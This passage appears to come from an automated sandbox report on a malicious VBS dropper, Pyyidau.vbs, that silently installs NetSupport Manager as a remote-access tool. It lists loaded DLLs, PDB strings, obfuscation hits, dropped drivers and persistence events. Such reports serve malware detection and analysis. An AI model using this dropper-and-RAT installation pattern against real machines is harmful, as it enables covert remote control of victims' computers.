                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcihooks.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: textshaping.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pciinv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msimg32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: oleacc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: storeinvdll.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windowscodecs.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mfc100u.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: linkinfo.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxdiagn.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: d3d11.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: d3d12.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: powrprof.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmmbase.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxgi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wmiclnt.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxgi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: umpdc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msxml6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: tapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                                Source: C:\Windows\SysWOW64\wscript.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Client32[1].ini
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: Pyyidau.vbsStatic file information: File size 8816052 > 1048576
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Program Files (x86)\NetSupport\NetSupport Manager\MSVCR100.dll
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdb4 source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernel32.pdb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2701499634.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\x64\release_unicode\winst64.pdb source: winst64.exe, 00000021.00000000.2613624042.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, winst64.exe, 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdb source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI3FCC.tmp, 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI51C1.tmp, 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: winspool.pdbM source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcrt.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wldap32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\exe\client32.pdb source: client32.exe, 00000026.00000003.2700723405.000000000097B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernel32.pdb source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: pcicfgui_client.exe, 00000024.00000002.2673326583.00000000026C0000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000003.2750993608.0000000007200000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2801948506.0000000008B90000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdbD source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp!D source: MSI3FCC.tmp, 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp
                                Source: Binary string: protobuf-net.pdb source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: winnsi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: cryptsp.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msls31.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: secur32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powershell.pdb source: Pyyidau.vbs.exe, 00000003.00000000.1717706981.0000000000271000.00000020.00000001.01000000.00000005.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernel32.pdb] source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: netutils.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: tapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wrpcrt4.pdbx source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: npciinv.pdbd source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: shlwapi.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp, client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmp
                                Source: Binary string: wwin32u.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: shcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: riched20.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\pciinv.pdb G source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleaut32.pdb3 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: sechost.pdb9 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Amsi.pdb5 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpOD source: MSI2BE4.tmp, 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: cryptsp.pdbZ$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dnsapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: userenv.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wimm32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wwin32u.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: setupapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winhttp.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dxdiagn.pdbn$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: devobj.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: gdiplus.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: rtutils.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: profapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dhcpcsvc6.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: opciinvclient32.pdbwkernel32.pdb\Program Files (x86)\NetSupport\NetSupport Manager\Support ManagerD source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: |E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbpdblient32.pdb@ source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: WLDP.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System32\wkernel32.pdbG source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pyyidau.vbs.exe, 00000003.00000002.1836537031.0000000008360000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: setupapi.pdb5 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msxml6.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: version.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp source: MSI264F.tmp, 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI51C1.tmp, 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: dbgcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: riched32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdb source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wintrust.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ws2_32.pdb/ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System32\wkernel32.pdb2 source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Kernel.Appcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb( source: client32.exe, 00000026.00000003.2701499634.0000000004EEA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: psapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernelbase.pdb( source: client32.exe, 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700024684.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\dll\wkernelbase.pdb1} source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wtsapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wmiclnt.pdb3 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleaut32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: comctl32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: crypt32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemprox.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: crypt32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp

                                Data Obfuscation

                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, ListDecorator.cs.Net Code: Read
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                                Source: Yara matchFile source: 3.2.Pyyidau.vbs.exe.bb10000.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.1883031177.000000000BB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: C:\Windows\Installer\MSI264F.tmp, Code function: 28_2_00B25490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,28_2_00B25490
                                Source: nspscr.sys.22.dr, Static PE information: section name: PAGEABLE
                                Source: mfc140u.dll.22.dr, Static PE information: section name: .didat
                                Source: libssl-1_1.dll.22.dr, Static PE information: section name: .00cfg
                                Source: libcrypto-1_1.dll.22.dr, Static PE information: section name: .00cfg
                                Source: C:\Windows\Installer\MSI264F.tmp, Code function: 28_2_00B564CF push ecx; ret 28_2_00B564E2
                                Source: C:\Windows\Installer\MSI264F.tmp, Code function: 28_2_00B3DD05 push ecx; ret 28_2_00B3DD18
                                Source: C:\Windows\Installer\MSI2BE4.tmp, Code function: 30_2_004C64CF push ecx; ret 30_2_004C64E2
                                Source: C:\Windows\Installer\MSI2BE4.tmp, Code function: 30_2_004ADD05 push ecx; ret 30_2_004ADD18
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Code function: 31_2_00EA80C5 push ecx; ret 31_2_00EA80D8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Code function: 31_2_00EAE195 push 3BFFFFFFh; retf 31_2_00EAE19A
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Code function: 31_2_00EC04BF push ecx; ret 31_2_00EC04D2
                                Source: C:\Windows\Installer\MSI3FCC.tmp, Code function: 32_2_001E64CF push ecx; ret 32_2_001E64E2
                                Source: C:\Windows\Installer\MSI3FCC.tmp, Code function: 32_2_001CDD05 push ecx; ret 32_2_001CDD18

                                Persistence and Installation Behavior

                                Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\loca[1].htm
                                Source: C:\Windows\System32\msiexec.exe, Executable created and started: C:\Windows\Installer\MSI51C1.tmp
                                Source: C:\Windows\System32\msiexec.exe, Executable created and started: C:\Windows\Installer\MSI2BE4.tmp
                                Source: C:\Windows\System32\msiexec.exe, Executable created and started: C:\Windows\Installer\MSI264F.tmp
                                Source: C:\Windows\System32\msiexec.exe, Executable created and started: C:\Windows\Installer\MSI3FCC.tmp
                                Source: C:\Windows\System32\msiexec.exe, File created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sys
                                Source: C:\Windows\System32\msiexec.exe, File created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys
                                Source: C:\Windows\System32\msiexec.exe, File created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys
                                Source: C:\Windows\System32\msiexec.exe, File created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sys
                                Source: C:\Windows\System32\msiexec.exe, File created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, File created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, File created: C:\Windows\system32\drivers\nskbfltr2.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F4F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20DE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F1F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FBE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2610.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLLJump to dropped file
